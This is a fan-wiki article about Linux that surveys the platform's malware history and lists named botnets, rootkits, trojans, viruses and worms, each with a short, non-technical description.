malwarewikiaorg-20200223-history
Linux
Linux is a Unix-like and mostly POSIX-compliment computer operating system assembled under the model of free and open-source software development and distribution, first released on October 5, 1991 by Linus Torvalds. The defining component of Linux is the Linux kernel, which is an operating system kernel. Although Linux is for the most part open-source, some proprietary software is available for it. Its death screen is the Kernel Panic. Due to its relatively low market share over the years and extra security added, there is not as much malware written for Linux as there is for Windows. Most of the malware written for it is targeted towards websites or large business organizations due to the fact that it is a top choice for businesses and website administrators. Nevertheless, the misconception that Linux is completely malware-free is a tired rumor and is completely incorrect. Although there is not as much malware written for it, unlike Windows, cross-platform malware is becoming increasingly popular (since the common frameworks such as .net Framework and Qt are cross-platform), and malware writers are now targeting Linux on the desktop more frequently. Android, which is a Linux distribution, is also one of the most targeted platforms in the world for malware. Some malware (such as Remaiten) may even run on other architectures (such as ARM or MIPS). Threats Below is a small list of known Linux malware. This list mostly contains the most significant viruses on the platform, although some of them no longer work or are no longer in maintained. Botnets *Mayhem (x86, amd64) - A multifuctional botnet that works on Linux and FreeBSD. It was most prominent in October 2014 when it spread using the Shellshock vulnerability to thousands of websites. *Remaiten (x86, mips, mipsel, armeabi, armebeabi) - A botnet that mostly targeted vulnerable routers and IoT devices. Rootkits *Snakso-A (amd64) - A 64-bit Linux webserver rootkit that does iFrame injections. Trojans *Effusion (x86, amd64) - A 32/64-bit injector for webservers running Apache and Nginx. Discovered in 2014 *Hand of Thief (x86, amd64) - A banker trojan for Linux that was discovered in 2013, mostly ineffective due to relying 100% a user running the file. *Kaiten (x86, amd64) - Kaiten is backdoor trojan that connects to an IRC channel to allow hackers to remotely control an infected computer, mostly used for DDoS attacks. *Turla (x86) - Turla is a Trojan package that targets the Linux operating system. Although it was never confirmed, it is suspected it may have been written by the Russian government for use in targeting other governments and militaries since at 2008. *Rexob (x86) - Backdoor trojan *Tsunami (x86, amd64) - Active botnet trojan that targets Linux systems, mostly used for DoS attacks. *Waterfall screensaver - This malware has no official name. It spread via gnome-look.org in 2009 and was used for denial of services attacks against a website called MMOwned, which provides exploits for popular MMORPGs. The malware was removed shortly from the site after the discovery was found. It only targeted Debian-based systems. Viruses *42 (x86) - Open source virus which uses CRC32 instructions for decryption. *Arches (x86) - Open source virus that infects ELF files. *Alaeda (x86, amd64) - A virus that infects other binaries that are in the same directory. *Binom (x86, amd64) - A virus that infects other binaries in a similar manner to Alaeda. Requires root *Bliss (x86) - A virus from 1997 that is speculated to be a proof-of-concept virus rather that an actual virus. Requires root privileges. Debian Linux is still vulnerable to this virus, but due to the fact that it requires root privileges, this risk is very minimal. To uninfect files you can run the binary and "--bliss-uninfect-files-please" to disinfect your system. *Brundle (also known as Brundle-Fly) (x86) - An open source research virus, which has its own website and uninstaller. *Bukowski (x86) - A research virus meant to state that current popular approaches to software security (DAC VMA, randomization, and others) are not sufficient enough and that other approaches should be considered seriously. This one also has its own website. *Caveat (x86) - Open-source virus *Coin (x86) - Open-source virus *Diesel (x86) - A file infecting virus similar to Alaeda and Binom. Discovered in 2002. *Hasher (x86) - Open-source virus *Kagob.a (x86) - File infector virus *Kagob.b (x86) - File infector virus *Lacrimae (x86) - *Lindose (also known as PEElf and Winux) (x86) - The first cross-platform virus that affects Microsoft Windows and Linux computers. It was never in the wild, it was only a proof of concept virus. *Linux.Encoder.1 (also known as Trojan.Linux.Ransom.A) (x86, amd64) - Ransomware trojan targeting computers running Linux. First Ransomware Trojan discovered on Linux. Discovered on November 5, 2015. Infected several thousand websites. *MetaPHOR (also known as Simile) (x86, amd64) - *Nuxbee (x86) - Fairly harmless and non-memory resident parasitic Linux virus. It searched for ELF files in the directory bin, then wrote itself to the middle of the file. Discovered in December 2001. Requires root *OSF.8759 (x86) - Dangerous virus that infects all the files in a directory that it can find, and also infects system files if ran with root. It also installs a backdoor onto the system. Discovered in 2002. *Podloso (also known as the "iPod virus") (x86) - *Rike (x86) - *RST (x86) - Most prominent for infecting Korean releases of Mozilla Suite 1.7.6 and Thunderbird 1.0.2 in September 2005. It installs a backdoor to the system. *Satyr (x86) - Harmless non-memory resident parasitic Linux virus. It searches for other ELF files in the system and infects them. *Staog (x86) - The first virus ever written for Linux, in 1996. It was notable for exploiting kernel vulnerabilities to stay resident and infect binaries. It was written in assembly by the hacker group VLAD. *Vit (x86) - ELF virus from 2000. *Winter (x86) - Smallest known Linux virus that infects ELF files. *Wit (x86) - Most likely another proof of concept virus. *Zariche (x86) - *ZipWorm (x86) - Passes by infection of .zip files. Worms *Adm (x86) - Network worm from 2001 that exploited a buffer overrun, and scans computers in the network for open ports, attempts the attack, infects web pages hosted on the system and propagates further. *Adore (x86) - An infected computer scans the network for DNS, FTP, and printer servers, infecting them with various methods. A backdoor is installed, and the worm propagates itself. From 2001 *Bad Bunny (x86) - Discovered in 2007, it is a cross-platform computer worm written in several scripting languages and distributed as an OpenOffice.org document, which contains a macro written in StarBasic. It runs badbunny.js under Microsoft Windows, badbunny.pl under Linux, and badbunny.rb, and displays a message box and a pornographic image when successfully ran. *Cheese (x86) - Used a backdoor which was installed by another worm. Cheese then removed the backdoor and propagated. *Devnull (x86) - Computer worm (named after /dev/null) that executes a shell script and connects to an IRC client which then waits for commands. *Kork (x86) - Worm that only targets Red Hat Linux 7.0. Downloads files that no longer exist, so the virus no longer works. *Lion (or L10n) (x86) - Worm that was active in 2001 but no longer works. *Darlloz (several) - Worm that targets home routers, set-top boxes, security cameras, industrial control systems, and other IoT devices. *Lupper (x86) - *Mighty (x86) - Appeared in 2002 and used a vulnerability in Apache, also installed a backdoor and joined an IRC botnet. *Millen (x86) - This worm replicated to Linux systems on Intel platforms and used remote exploits on four different servers to spread to vulnerable computers. If it was successful at exploiting a system, it spawned a shell on the system to retrive the mworm.tgz package by using ftp. It then uncompressed the contents of the mworm.tgz file to the "/tmp/..." directory. The worm was also opens a backdoor on port 1338 and offer a remote shell to an attacker for connecting to this port. *Ramen (x86) - Worm that only targeted RedHat systems *Slapper (x86) - Used the same vulnerability as the Mighty worm. It also operated similarly *SSH Bruteforce (x86) - Worm that has no official name, it was never spread or released into the wild but was in alpha testing in 2007. References https://en.wikipedia.org/wiki/Linux Category:Operating systems Category:Linux